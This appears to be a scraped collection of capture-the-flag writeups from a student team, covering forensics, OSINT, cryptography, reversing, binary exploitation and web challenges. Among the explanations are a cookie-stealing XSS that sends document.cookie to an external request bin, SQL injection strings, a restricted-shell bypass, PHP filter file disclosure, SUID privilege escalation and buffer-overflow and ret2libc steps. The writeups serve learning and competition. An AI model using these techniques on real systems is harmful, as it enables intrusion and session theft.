Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
aka working with pcaps
Loading...
Loading...
Loading...
Some of the Forensics Challenges from Hacktoberfest CTF 2020.
Loading...
Loading...
Loading...
taking small Bites of Bytes
File
looks hard to reverse, but really it just checks a funtion's output
Put a break on both checks
set the value of eax to 0 to pass them
get the flag
darkCTF{4rgum3nts_are_v3ry_1mp0rt4nt!!!}
First off, running python3 sherlock 0xDarkArmy
gives us hits on reddit, instagram and twitter, among others.
While nothing interesting was found on the twitter or instagram, there was a qr code posted on the reddit page, seen here
Scanning the qr code, we are directed to a .onion
site, openable in tor. see here
At a first look it seems like a static template page. However navigating to /robots.txt
we get half of the flag: darkctf{S0c1a1_D04k_
Opening up developer tools and going to the 'networks' tab, we can see that in the get request to the page, there is a custom HTTP header Flag:
under Date. This contains the second half of the flag: _w3b_051n7}
darkctf{S0c1a1_D04k_w3b_051n7}
Don't Try to break this jail.
ssh wolfie@linuxstarter.darkarmy.xyz -p 8001 password : wolfie
Sshing in and running echo $SHELL
shows us we have an rbash shell- that is, a restricted shell.
Googling how to bypass this I found you could add 'bash --noprofile' to the end of the ssh command.
So running ssh wolfie@linuxstarter.darkarmy.xyz -p 8001 'bash --noprofile'
gives us an unrestricted shell. From there, just cd imp
and cat flag.txt
to get the flag.
darkCTF{h0pe_y0u_used_intended_w4y}
Wolfie is doing some illegal work with his friends find his contacts.
Wolfie getting free games from somewhere. Find the full url to that game. Note: Use the same file provided in Wolfie's Contacts Flag Format: darkCTF{http://site}
file
Using the same file from Wolfie's contacts, I searched for the string http://
in autopsy.
There were a few results but one was a .zip so I assumed this was the game.
darkCTF{http://aries.dccircle34.com/realitydownloadgo/c4d37739ca3dc3ed2d4852395d5ed228/784b4647446e334c58556e5473326556422e624f612e51432e4a6472/2019/07/31/PencakSilat2_1.zip}
csictf ran from 17/07/2020 to 21/07/2020.
"Hello, hello, Can you hear me, as I scream your Flag! "
Welcome to crypt0nite, a CTF team consisting of high school and university students. Here you can find our writeups and hopefully some useful resources!
Googling M4 UKW
, we find out this is a type of enigma. M4 means there are 4 rotors; Gamma is the setting for the first rotor; the preceding 4 pairs of numbers are position and ring values respectively and the string of letters at the end are the plugboard values.
This leaves us with almost everything needed to decrypt the ciphertext. However, we are not given the values for rotors 2, 3 or 4; they can be in any position from I to VIII, so bruteforcing this we get the following:
Using this website, we get the flag:
Flag: csictf{no_shit_sherlock}
Netcat into the given domain an port. Trying a bunch of different commands it appears that none of them do what you'd expect.
Running alias
shows that there are different aliases for commands which let you open files. Instead of trying to figure them all out I converted the flag.txt
file to base64 with base64 flag.txt
. Then it was a simple matter of copying the output and decoding it (I used cyberchef).
A reporter wanted to know where this flight is headed. Where does he (the reporter) live?
Google image search reveals a screenshot of a tweet by Jack Ma containing the image. If we go onto his profile and find the tweet. Using Ctrl-F through the replies, we find this comment of a reporter asking where the flight is headed, mentioning they're from San Francisco.
Flag: csictf{san_francisco}
Very easy misc challenge.
Join the discord server
Run .flag
Bot says to dm and then deletes your message
Simply message the bot with .flag
and you get the flag from the bot.
The original photographer of this picture commented the flag on his post. Find the flag.
Good old Ironstone found the picture in this tweet. The comments mention that Arunopal Banerjee is the actual photographer; visiting the instagram account we find the picture posted, and the flag is in the comments.
Flag: csictf{pl4g14r1sm_1s_b4d}
Change your User-Agent to the Windows 95 profile and you see the flag.
Hoshimaseok is up to no good. Track him down.
A quick google of the user hoshimaseok
leads us to a GitHub page, found here.
We see two repositories, one called SomethingFishy
. Fishy it looks indeed.
A quick glance inside this repo reveals nothing. However considering the title, Commitment, maybe there is a commit somewhere with the flag.
We can see that there are two branches - master
and dev
. Upon clicking compare
, we see that there have indeed been many changes to this repo.
Scrolling through these, you will find the flag in index.js
, which was deleted.
The contents of index.js are as follows:
Flag: csictf{sc4r3d_0f_c0mm1tm3nt}
I googled some of the keywords from the challenge brief
istanbul shanghi macau suits
In the results pictures of James Bond showed up, James Bond's most recent boss (known as M) is called Gareth Mallory.
Flag: csictf{gareth_mallory}
Wanna enter the Secret Society? Well you have to find the secret code first!
Again, smash the keyboard.
Flag: csivit{Bu!!er_e3pl01ts_ar5_5asy}
Travelling through spacetime!
Sadly, we can't just smash the keyboard. Let's check what protections are enabled.
NX is enabled, so unfortunately no shellcode, but no other protections. Let's perhaps decompile it in GHidra.
So we have a 44-byte-long buffer storing our input, which is read by gets()
- a clear buffer overflow vulnerability. Interestingly, the program seems to also return the flag if the if condition is met. I've known GHidra to make mistakes with numbers, so I check the disassembly in radare2.
As we can see, the buffer our input is stored in is lower down the stack to the variable that is compared, so if we overflow the buffer we will overflow into the other variable. From the decompilation we know the buffer is 44 bytes long, so we need 44 bytes of padding before we reach the checked variable and write 0xcafebabe
.
Flag: csictf{c4n_y0u_re4lly_telep0rt?}
Try to find username and password.
Webiste: http://simplesql.darkarmy.xyz/.
In the source we see the comment <!-- Try id as parameter -->
.
Injecting a simple ?id=1 or 2=2
gives us the response Username : LOL Password : Try
.
Trying ?id=2 or 2=2
gives us a difference response, Username : Try Password : another
, so I tried a few more till at http://simplesql.darkarmy.xyz/?id=9%20or%202=2
you get the flag.
darkCTF{it_is_very_easy_to_find}
Mr.Wolf was doing some work and he accidentally deleted the important file can you help him and read the file? ssh ctf@findme.darkarmy.xyz -p 10000 password: wolfie
Running ps aux
to see the running processes showed us that the command tail -f /home/wolf1/pass
was running at PID 10. However in the /home/wolf1 directory, this file was not to be found.
After googling how to view the contents of a background process I ran the command cat /proc/10/fd/*
and got mysecondpassword123
.
Since there was a wolf2
directory I figured this was the password for wolf2, so running su wolf2
and inputting this as the password means we are now wolf2. List the files and get the flag.
darkCTF{w0ahh_n1c3_w0rk!!!}
you either know it or not take this and get your flag 5552415c2b3525105a4657071b3e0b5f494b034515
The encrypted text we got given was
Some fiddling around with the capitalisation of the base64 characters got us the actually-printable string
which decoded to yield the flag.
flag{does_this_even_count_as_cryptooo}
Again, smashing the keyboard doesn't work. Sadly. Let's check out the protections:
Again, smashing the keyboard doesn't work. Sadly. Let's check out the protections.
Same thing again, GHidra decompilation time.
Again, gets()
shows a clear buffer overflow vulnerability. Among other functions there is a flag()
function.
So, calling flag()
returns the flag. Unsurprisingly.
We'll be using the buffer overflow vulnerability to redirect code execution to the flag()
function. Some experimenting shows a padding of 40 bytes is needed to overwrite RIP.
Flag: csictf{ch4lleng1ng_th3_v3ry_l4ws_0f_phys1cs}
My first C program that says hello, do you want to try it?
Smash was a very cool challenge where you were given the libc
version used by the binary. You had to bypass ASLR and then execute a ret2libc attack.
As per usual, run a quick checksec
Luckily for us, PIE is disabled and there is no canary. That makes our job much easier. Let's run it and see what happens.
Hmm, our input is printed back to us again. Is there another format string bug?
Indeed there is! Is a BoF possible this time?
Awesome.
There's nothing particularly interesting in the decompilation - main
takes input and calls say_hello
, which prints back to you.
No interesting strings either. As we are given the libc
, everything points to a good old ret2libc attack.
As we only had one input, the logical approach would be to use a ret2plt to leak the address of puts in libc
from the global offset table and call main again to let us have another input.
Flag: csictf{5up32_m4210_5m45h_8202}
Rick has been captured by the council of ricks and in this dimension Morty has to save him, the chamber holding Rick needs a key . Can you help him find the key?
First, let's see what running the program does.
The pairs of numbers are the program, the singular numbers are me typing back to it.
There's nothing particularly clear here, so let's disassemble it in GHidra.
It looks very complicated, but we can ignore the bulk of it. What we need to focus on is the random number generation and what happens to it.
Two random numbers are generated. They are passed into function1
, then we +3
to the result and pass it through function2
. The result of that is then compared with the number we input. If they are not the same, the check
is set to 0.
At the end, if it's not 1 (and if takes under 30 seconds) the flag is read. So clearly we have to receive the numbers, work out what it does and then return the values (repeatedly) to get the flag.
Let's check what the two functions do.
We have a counter
that loops until it is greater than a number; if both numbers are divisible by the counter
the answer gets set to counter
- this is clearly some sort of highest common factor function.
This looks like a weird function, but if you write it in, say, python, it's much clearer what it does:
This is a factorial function.
Now we know what it does, the flow is simple:
And we can write a script that does this for us.
Flag: csictf{h3_7u2n3d_h1m531f_1n70_4_p1ck13}
I lost my phone while I was travelling back to home but I was able to get back my eNB ID, MCC and MNC could you help me catch the tower it was last found. Note: decimal value upto 1 digit
So firstly, after seeing what they have said about the eNB ID
, MCC
, and MNC
, I decided to look up what they meant, so :
eNB ID
: used to identify an EnodeB uniquely
MCC
: mobile country code
MNC
: mobile network code
You can distinguish which one is which by knowing that the MCC
and MNC
are both 3 digits so 81097
must be the eNB ID
We can use the MCC
and MNC
to find out that the cell tower is in the US, and that its provider is AT&T. Now we need to triangulate the cell tower so after a bit of googling I found a website called cellmapper.net, where you can specify the eNB ID
, MNC
and MCC
, so finally you get the latlong coordinates by clicking on the location, which are 32.8464489
and -24.554806.
Because we know that the briefing says the format is darkCTF{latitude, longtitude}
to 1 decimal place we know that the flag is DarkCTF{38.4, 24.5}
The rounding is very odd
The challenge hinted at the need to use the tool Volatility
.
First we run volatility -f memdump.raw imageinfo
on the dump to get the OS version. We then use the cmdscan
command to check the most recently run commands.
One of these is
JCTF{nice_volatility_tricks_bro}
We used this tool to guess the key, setting the keylength to 4 as this was said in the briefing.
We then used cyberchef to XOR the file with the key 5a 41 99 bb
It says it determines a .zip
file, but when unzipping you realise it's a .docx
file so change the extension to get:
flag{xor_is_not_for_security}
Greta Thunberg 1 Administration 0
This was a different type of binary exploitation challenge. First, check the protections.
Much like the others. Let's run it.
So our input is sent back to us, along with the notice that we cannot log in with input. As we control the print, let's check if there's a format string bug.
And indeed there is. Interestingly, there's no buffer overflow. Let's decompile it to see what's going on.
main
is very simple - takes in input (using a secure fgets()
, explaining why there was no BoF) and passes the input to the login()
function.
Input it printed back to us, as we saw, with printf
. This causes the format string. The interesting part is it checks the global admin
variable before printing the flag.
Clearly, we have to overwrite the admin
variable somehow. To do this, we're going to have to leverage the format string %n
specifier for an arbitrary write.
%n
takes a pointer to a signed int, where the number of characters written so far is stored. Because we can control certain aspects of the stack (as the buffer is on the stack) we can tell it where to write the data. As we can control the input, we can tell it how much. This gives us an arbitrary write. If we want to write 20 bytes somewhere, we input 20 characters and then call %n
. We can even use other fancy format string specifiers to shorten it enough,
I would explain how to leverage this in detail, but frankly, others have done so much, much better than me :)
There are plenty more resources online.
Luckily for us, pwntools
contains a feature to automate %n
exploitation.
You should understand how the exploit works before you use tools to do it for you.
The pwntools module is fmtstr_payload
, and takes in two values: the offset for the format string and a dictionary. The keys in the dictionary are the location to write to, and the values are the data to write there.
Flag: csictf{n0_5tr1ng5_@tt@ch3d}
Just run
These 3 guys encrypted my flag, but they didn't tell me how to decrypt it.
The source is as follows:
I decided to cheese it and use RsaCtfTool.
Simply inputting the values as so, we get our flag:
csictf{sh0uld'v3_t4k3n_b1gg3r_pr1m3s}
Rivest-Shamir-Adleman is the full name for , a public-key cryptosystem widely used. You'll come across it many times in CTFs.
Now you can either try to break it manually, or use the great tool .
We can't use cat
to read the file, so we'll have to find another way.
"People who get violent get that way because they can’t communicate."
Navigating to /robots.txt
, we see:
Navigating to /fade/to/black
, we get the flag.
Flag: csictf{br0b0t_1s_pr3tty_c00l_1_th1nk}
My nephew is a fussy eater and is only willing to eat chocolate oreo. Any other flavour and he throws a tantrum.
Nice and simple web challenge.
Looking at the cookie of the webpage it appears to base64 encoded.
Encode the word "chocolate" into base64 then replace the current base64 in the cookie. The only thing to note is make sure that the base64 is also url encoded.
Use n
, e
and c
in RsaCTFtool.
Looking at the source you can see that a request is made to http://chall.csivit.com:30256/view
by the admin to view your colour. You can then specify a URL and a colour for the admin to use.
I set up a request bin at https://ennfyqj04serj.x.pipedream.net
so that I easily could monitor requests made to that URL. But setting the URL that the admin visits to anything outside of http://chall.csivit.com:30256/view
seemed to throw an error. However I can set the colour to anything I like.
Looking at the source of http://chall.csivit.com:30256/
it is clear that the only form of sanitising is that "<" or ">" are replaced with "". This means that later on I could use ">>" in the place of ">" and "<<" in the place of "<".
The final exploit looked like the following:
Everything before and including the first semi-colon is used to escape the tags/quotes which the url is in.
The admin cookie is then sent to https://ennfyqj04serj.x.pipedream.net/?c="+document.cookie
and the cookie is your flag.
So first we see that running the program slowly decrypts the string to yield a flag - but it's simply not fast enough. It never ends - we can check by putting a print()
statement at the end. So, we'll have to somehow make it go faster - and to do this we need to work out what the functions do.
The b()
function looks like this:
If we have a look at what it's doing, it seems to be reversing the input and comparing the two - so it returns True
if the inputted number is palidromic, and False
if it is not. We can't really make this more efficient, at least noticably.
The a()
function, however, looks like this:
What this seems to be doing is looping through every value from 2
to n-1
and checking if n
is divisible by it - a way of checking if it's prime. However, this is incredibly inefficient, and is probably the reason it takes so long. Let's make it more efficient and see if it does something.
We are going to use the sympy
function isprime
to change a()
:
Running this program spits out the full flag much faster now.
flag{pR1m3s_4re_co0ler_Wh3n_pal1nDr0miC}
Firstly I used 7z
to unzip the .apk
file.
Then I checked strings to see if there was a flag somewhere. Surprisingly, there was.
flag{4ndr0id_1s_3asy}
A with CAndroid, I used 7z
to unzip the .apk
file.
Then I grepped all the files to see if there were any references to flag
. If there were, I checked them out.
This shows match in "classes.dex"
flag{3asY_4ndr0id_r3vers1ng}
I recovered a binary from my teacher's computer. I tried to reverse it but I couldn't.
Running file blaise
gives us this output:
Important thing here is it isn't stripped, that it is dynamically linked, and it's 64-bit, which will make the rev easier.
When we first run the file, we are given a two digit number, like so:
And we are promted for input. Inputting letters seems to end it, however typing a number keeps it running, and we can enter more:
Let's throw it into ghidra to see the pseudo-c code of the file. I've prepared the decompilation by renaming functions and variable already. Here's what our main function looks like:
However there isn't much useful info here, although we know that it calls the functions display_number
and process
Let's decompile display_number
:
We see here that it basically:
generates a random number between 15 and 20 (0xf and 0x14)
prints it
returns it
Let's decompile process
now:
This is most important function, and a lot is going on here:
Firstly, we basically create a for loop using counter and the random number as the end
Then we read the input with scanf
Then with counter, and random number, we call another function called c
, and output is stored in output
. We'll come back to this in a bit
Then it compares this output with our input, and if they aren't equal it sets flagcheck
to false
Increments counter, and starts loop again
Finally, at the end, it checks if flagcheck
is true
, if it is, it gives us the flag
So, in order to do this challenge, we need to write a script that constantly gives a number to the program, that equals the output of c
, then reads the flag
c
Let's decompile c
:
So it makes 3 variables, using the f
function, and then returns a value based on those 3.
Lets' decompile f
:
Just does some maths with the provided number.
To convert our two numbers (random and counter) to what is needed of the program, we'll port these functions to python, like so:
Using these, and pwntools, we can write our final script, like so:
Flag: csictf{y0u_d1sc0v3r3d_th3_p4sc4l's_tr14ngl3}
Visiting the site, you can see that the location phphonebook.php
is referenced, however visiting the url as suggested (/index.php/?file=phphonebook.php
) it returns a blank page.
However, there is a trick to get around this - if you add a php filter on it so it encodes the content to base64 as demonstrated below: /index.php/?file=php://filter/convert.base64-encode/resource=phphonebook.php
This returns the source code which contains a very interesting piece of php.
This essentially means, if there is a variable in the POST request named emergency
, it will retrieve the contents of /flag.txt. We did this in two ways, with BurpSuite and with curl, but the curl request was much more simple, all was needed was: curl -X POST 'http://jh2i.com:50002/index.php/?file=phphonebook.php' -d 'emergency=999' | grep flag
Voila, the flag is returned. A relatively simple challenge, but it was definitely interesting to learn about the base64 filter.
Running strings
on the file yields the flag.
Disassembling it with radare2
and gdb
doesn't really seem to spit out anything interesting (as the binary is stripped), but we can use string to see that flag.txt
is within the binary. This hints that there is actually something there.
So, to check it out, I disassembled the binary in GHidra. Sure enough, FUN_0040130e
had some basic C code to read the file and output the results.
All we had to do was overflow the buffer and execute the function.
Using ragg2
I found that the padding was 497 bytes.
flag{legend_of_zelda_overflow_of_time}
As it's a docx
file we can extract all the individual parts using binwalk
.
Then we navigate to /root/Desktop/_microsooft.docx.extracted/src/
, open up oof.txt
and Ctrl + F
for flag
.
flag{oof_is_right_why_gfxdata_though}
Alternatively, if you don't want to use the command line, change the extension to .zip
and unzip
Navigate into the correct folder and open oof.txt
. ctrl + F
to search for the flag.
So first rag went around to common social media sites, and eventually found a GitHub account.
There was a pinned repository called Flagger. The directory was analysed, but nothing interesting was found except the description.
Capture the Flag service to collect flags
Sorry, your flag is in another castle.
At this point he had to go and I took over.
I decided to check his other repositories, one of which was a fork of a dotfiles repo. Since the other repo was a dead end, I decided to check this one out.
Something that caught my eye was the descriptive note GitHub added:
This branch is 2 commits ahead of calebstewart:master.
If it was two commits ahead, then this account must have mades those two changes. I clicked the Compare
button next to this to check the changes, and they were very interesting.
One of these was an OpenSSH private key.
Another was in .bash_history
:
So this was fairly clear; this key was used to SSH into the website on port 50033. I copied the SSH key into a file called key
, ran chmod 700
to change the permissions so that it allowed me to use it to SSH, and connected.
Once in, all we had to do was cat flag.txt
.
flag{nahamcontron_is_on_the_grid}
Take apart the javascript.
In there there is a reference to flag
with some base64 next to it.
Decoding the base64 gives us the flag.
You can use dig
to check out the URL.
flag{next_year_i_wont_use_spf}
You can also head over and input the URL there.
Rotten simply required you to use a caesar cipher to decode the text it sent you. Luckily, once decoded, all the text contained the word send
and this allowed us to filter out the correct shift.
The title and description implies that K is replaced with J.
So, we install the tool jsteg
and simply run jsteg reveal luke.jpg
.
flag{yeast_bit_steganography_oops_another_typo}
This challenge wasn't really anything special, just automate the process of fighting bosses until you have enough money to get a new weapon, rinse and repeat until you get the "tank" which can defeat the gnomes, when you do that the flag is printed.
Going to /robots.txt
reveals the server source code, along with some authentication checks.
We didn't really do this the intended way.
Set the auth cookie to
which is the encoded form of
This makes the SHA512 comparison always true, allowing you to log in as the admin.
We found some unusual activity coming from an employee's Windows 10 workstation at De Monne Financial. Our IT guy saved the memory dump to the file provided below. What was the PID of the program used
For this challenge, you get given a mem.raw
file. So initially this along with the title screams memory forensics and so the main program that comes to mind is Volatility, if unfamiliar with this tool, it can be best described as a memory forensics tool to help you look at memory captures of RAM. This tool should be automatically installed on Kali, but other distros should follow install instructions found on the GitHub page (linked above).
It is worth noting I used Volatility 2
in this writeup, the syntax for Volatility 3
is similar, just replace volatility
with vol3
it could also be worth noting that depending on your install, you might need to run it as volatility.py
So to start with you run the following command with a memdump/raw format, the imageinfo
plugin will provide basic information on the memory capture:
Breaking this command down we have the name of the program volatility
followed by -f
which tells volatility to take in the file mem.raw
, then as outlined above the imageinfo
plugin gives us basic information on the image. I then personally followed it with > raw_imageinfo.txt
just so I have it saved in a text file should i need it earlier. This is not essential, however i reccomend it, especially for when Volatility can have a lot of input, it also gives you the power of tools like grep
and awk
.
Then we take the profile, normally we take the first however it won't always work, luckily ,in this case, it was the first profile which is Win10x64_1734
.
We then run the following command as we were told we needed the PID
so automatically i decided to look at the processes, now this can be done with either the pstree
plugin or the pslist
plugin, the difference is mainly that pstree
gives us a more visual representation of which process was launched by which, whereas pslist
lists them all. I chose pstree
, the command is shown below:
Breaking this down, we have the volatility -f raw.mem
as I mentioned before which initialises Volatility along with specifying the file. The big difference here is that we now specify a profile as shown by the --profile=Win10x64_1734
part of our command, when we ran imageinfo
we took the profile and now we need to specify it to Volatility to run further plugins. The next part of our command is pstree
which as outlined above creates a tree of all processes on the system. I then also save this in a file again with > raw_pstree.txt
which helps me with things like grep but also means I only need to run this command once. Below is a shortened output for the sake of the writeup:
Now if we scroll down we see the below process:
I assumed this was the process as we know it was a Windows system from the challenge description. So for the flag, we simply took the PID
which was 3348
, which we then submitted as the flag in the form specified which was: flag{3348}
.
Writeup created by Chris Harris (cjharris).
Thanks for attending BSides, have a nice day!
As soon as we get the file, we see we can cause a segmentation fault:
First for the basic setup:
Now we can start the initial ret2plt. Interestingly, the elf.plt
dotdict does not work for some reason (some kind of parsing bug, I assume) so I had to hardcode in the PLT entries (which is fine, since there's no PIE):
Pretty simple - 40 characters up until the saved return pointer, a call to puts@plt
and we set puts@got
as the parameter to this as a way of leaking libc. Finally we set the return address to the location of main
- allowing us to have another run with the ret2libc.
Now we just need to parse the output:
Now we can finish it off with the ret2libc:
Flag: BSDCTF{3xpl0r1ng_th3_unkn0wn}
Using a , we calculate the offset until the saved return pointer to be 40.
As there is no PIE, our approach will be a standard followed by a .
You know what to do, collect them all.
As the title suggested, first check out robots.txt
:
Now head over to cookie.php
:
Nothing interesting, but again, the name of the page is a huge hint. Using Inspect Element, we can check document.cookie
and find out that we have cookies:
The Piece=1
cookie implies that there are more, so we can refresh the page. As expected, we get another cookie.
We can create a super simple python script to dump them all:
The Piece
cookies go up to 39
before starting again from 0
, so we assume there are 39. We now dump all 39 of them and save them to a file.
As they are hex, we first attempt some hex decoding, but that is unsuccessful. The next idea is to check if they are valid hashes, which they are! It appears as if each cookie is simply a hash of a letter of the flag, and we can dump all of the hashes here.
Now we can save this in cracked
and use some basic bash to isolate the individual letters and print them all out.
And we get the output
This looks a lot like ROT13, and once decoded from it we get the flag.
Flag: BSDCTF{C00k135_ar3_b35t_pl4c3_70_ch3ck}
Flags 1, 2, 3 and 4
SSHing in and running the command whoami
we see we're logged in as luciafer
.
Navigating to /home/luciafer/Documents
, I ran ls -alt
and the output was as follows:
Since luciafer
owns both these files, I can simply run cat flag1.txt
and cat .flag2.txt
to get the flags.
flag 1: flag{cb07e9d6086d50ee11c0d968f1e5c4bf1c89418c}
flag 2: flag{728ec98bfaa302b2dfc2f716d3de7869f3eadcbf}
After looking around, I found flag3.txt located at /home/spookyboi/Documents/flag3.txt
and flag4.txt at /root/flag4.txt
. Since luciafer doesn't have sufficient perms to read these files, I ran the command
find / -perm -u=s -type f 2>/dev/null
to find SUID files.
SUID is a special file permission for executable files, which enables other users to run the file with effective permissions of the file owner. This means we could privilege escalate to root or a higher privileged user, giving us perms to read the flag files.
This was the output:
The program ouija
jumped out to me, so i tried running it:
Excellent! it reads files in the /root
directory, meaning we simply go
We use the same program to get the flag from flag3.txt as so:
Note: as we start in the /root
directory, so must go back one (../
) to navigate to flag3.txt.
By das
The amcache can be a pretty handy tool to help build out a timeline of execution during an investigation, and is always located in \%SystemRoot%\AppCompat\Programs\Amcache.hve what was the application
So the description for this challenge briefly explains what amcache is, and also gives a link to a file.
If you want more information on Amcache, this is a great link.
So upon research, I found RegRipper can be used to do this, however, there are plenty of other great tools out there. The one I decided to use for this challenge was AmCacheParser.
AmCacheParser runs on Windows and is basically a tool to analyse and "parse" Amcache. so the command we run this through the windows command prompt.
We run the above command in the AmcacheParser
folder. To break this down we run AmcacheParser.exe
taking the -f
argument which tells the tool which file to take as an input, we then specify the file given which was Amcache.hve
. We also need to give an output for the files, this is the --csv
part of the command and we specify the folder next. This will run the tool and the output will be in the file OutputFolder
, or whatever you chose to name it.
So as the above image shows, we now have a lot of Excel files to sort through, I first re-read the description to see what we needed and it led me to look in the 20201017155041_Amcache_UnassociatedFileEntries
entry, which looks a bit like this:
Once here i then used the find tool (CTRL + F
) to search for mpowers
which was the user given to us by the description. Below are the entries for mpowers
, more specifically from the full path column.
Full Path:
c:\users\mpowers\appdata\local\temp\d930e9b6-7d1b-4a5d-804e-ce667e431ff9\dismhost.exe
c:\users\mpowers\desktop\ftk imager\ftk imager.exe
c:\users\mpowers\downloads\python-3.7.0-amd64-webinstall.exe
c:\users\mpowers\appdata\local\temp\4{b04d01b2-0174-4ef5-8fb5-84584c0964f5}.be\python-3.7.0-amd64-webinstall.exe
c:\users\mpowers\appdata\local\temp\4{4a1d9cda-5382-4f04-b44d-51927f9c602a}.cr\python-3.7.0-amd64-webinstall.exe
c:\users\mpowers\desktop\sub-win-x64_104.148.109.124_5682_3262.exe
So as shown above, we have quite a lot of file paths. We were told to find what he installed, so I instantly looked deeper at the python install executables. It is very clear he installed Python
on the system so i tried the flag as flag{python}
and we scored the flag.
Writeup created by Chris Harris (@cjharris18)
Right so they started off easy. Opening up the pcap I used the http
display filter to show packets of this protocol:
Opening up the details for the first packet, we can see the full request URL
at http://www.sinotes.com/wp-content/themes/avada/picture4.png. I then ran wget
http://www.sinotes.com/wp-content/themes/avada/picture4.png
to download the file. As the brief suggests, this is not a png but rather a windows executable. Therefore renaming it to ecorp.exe
and running the command md5sum ecorp.exe
gives us the flag of flag{a95d24937acb3420ee94493db298b295}
.
Here, we need to use some display filters to refine our search. Firstly, we know it uses the same port as HTTPS. This is port 443. Secondly, We're talking about the malware and know that the infected client's ip is 192.168.1.91
from challenge 1. Putting this into a display filter would look like this:
Although there are quite a few packets, there are only so many different ips, so trying about 5 got me the correct answer, which was flag{213.136.94.177}
.
This was an interesting one. After some googling, I found out that Certificates are sent during tls handshakes, as TLS is used to encrypt HTTP traffic, making it HTTPS. The Display filter i needed to show these packets was tls.handshake.type == 11
.
As said in the brief, we need the packet from the source IP 37.205.9.252
. Therefore expaning this packet's details, then TLSv1.2 Record Layer: Handshake Protocol: Certificate
then Handshake Protocol: Certificate
then Certificates
then subject: rdnSequence (0)
finally gives us the LocalityName.
flag{Mogadishu}
By das :)
Like the others, you can just filter for http
traffic and get the flag:
flag{205.185.125.104}
We're looking for a domain, so it must be a dns
query. Therefore filtering for DNS traffic and specifying the ip (10.0.0.163
as this is the infected client from part 1, and the infected client must've made the query) we can get the flag-
flag{vlcafxbdjtlvlcduwhga.com}
By das
Simply opening it up in wireshark, we can see the flag-
flag{solut.exe}
All you need to do here is filter for dns
traffic. Because there weren't too many packets, I spotted the flag almost immediately and didn't have to filter further.
flag{solution.myddns.me}